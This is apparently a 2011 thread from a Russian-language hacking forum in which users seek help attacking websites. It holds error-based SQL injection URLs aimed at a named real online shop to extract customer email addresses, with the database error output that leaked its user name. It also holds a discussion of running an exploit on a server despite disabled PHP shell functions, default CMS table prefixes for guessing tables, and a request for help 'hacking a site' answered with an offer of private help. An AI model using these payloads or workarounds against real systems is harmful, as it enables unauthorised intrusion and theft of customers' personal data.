18.07.2011, 23:07
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
С нами:
8534431
Репутация:
76
|
|
запрещены следующие функции php
Сообщение от None
escapeshellarg,escapeshellcmd,exec,passthru,proc_c lose,proc_get_status,proc_open,proc_nice,proc_term inate,shell_exec,system,ini_restore,popen,dl
Нужно запустить свою прогу (сплоит из под веба). подскажите плиз функции другии которые это могут сделать |
|
|
19.07.2011, 00:07
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Nightmarе
echo `ls -la`;
Можно не благодарить
это алиас shell_exec, а он disabled - так что не прокатит.
|
|
|
|
19.07.2011, 16:07
|
|
Новичок
Регистрация: 27.04.2010
Сообщений: 0
С нами:
8443608
Репутация:
0
|
|
Помогите пожалуйста с инъекцией
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
|
|
|
|
19.07.2011, 16:18
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Flashmx
Помогите пожалуйста с инъекцией
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
эм... а из каких соображений там инъекция?
|
|
|
|
19.07.2011, 18:43
|
|
Новичок
Регистрация: 20.09.2009
Сообщений: 1
С нами:
8758602
Репутация:
0
|
|
Подкиньте префиксы от таблиц.
|
|
|
|
19.07.2011, 19:34
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Vostok
Подкиньте префиксы от таблиц.
Стандартные префиксы разные в каждой CMS.
Для DLE - dle_
Joomla - jos_
WordPress - wp_
И т. д.
|
|
|
|
19.07.2011, 19:39
|
|
Новичок
Регистрация: 27.04.2010
Сообщений: 0
С нами:
8443608
Репутация:
0
|
|
Сообщение от Seravin
эм... а из каких соображений там инъекция?
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
1064 - You have an error in your SQL syntax
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat(user(),floor(rand(0)*2)) having min(0) or 1 -- 1
1062 - Duplicate entry 'easyhw@localhost1' for key 1
|
|
|
|
19.07.2011, 19:51
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Flashmx
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
1064 - You have an error in your SQL syntax
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat(user(),floor(rand(0)*2)) having min(0) or 1 -- 1
1062 - Duplicate entry 'easyhw@localhost1' for key 1
Третья ветка. Надо читать мануалы
Сообщение от Seravin
эм... а из каких соображений там инъекция?
Прокрути страницу вниз
|
|
|
|
20.07.2011, 03:38
|
|
Новичок
Регистрация: 29.09.2010
Сообщений: 21
С нами:
8220566
Репутация:
0
|
|
Hi guys, I need help for hacking a site. Well first I sorry for that I'm writing on english (i will use and google translator for russian, but not sure if will be understandable). So I'm not good, well let's be honest, I'm noob in this (hacking, sql hacking etc). But after hours of trying I found a vuln (not sure), but I think is vuln.
Сообщение от None
SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or description_en like '%77'%' or name like '%77'%') ORDER BY visits,name asc' at line 1
Well is that a vuln ? And If it, can you help me with creating a sql injections ?
Now I will try to translate it to russian, and really sorry about that. i'm from Bulgaria and I should understand your language, but unfortunately I don't. And I think if I write it to bulgarian you wont understand it, so...
Translate from google translator:
Привет, ребята, мне нужна помощь для взлома сайта. Ну сначала я извиняюсь за это я пишу на английском языке (я буду использовать и Google Translator для России, но не уверен, если будет понятно). Так что я не очень хорошо, ну давайте будем честными, я нуб в этом (взлом, взлом SQL и т.д.). но после нескольких часов пытался я нашел vuln (не уверен), но я думаю, vuln.
Сообщение от None
SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or description_en like '%77'%' or name like '%77'%') ORDER BY visits,name asc' at line 1
Ну, что vuln? И если это, можете ли вы помочь мне в создании SQL-инъекций?
Теперь я постараюсь перевести его на русский, и действительно сожалею об этом. Я из Болгарии и я понимаю ваш язык, но к сожалению я не делаю. И я думаю, если я напишу его на болгарский вам не понять, так что ... |
|
|
|
20.07.2011, 03:51
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
Сообщение от beBoss
But after hours of trying I found a vuln (not sure), but I think is vuln.
PM me link - i will try to help you
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
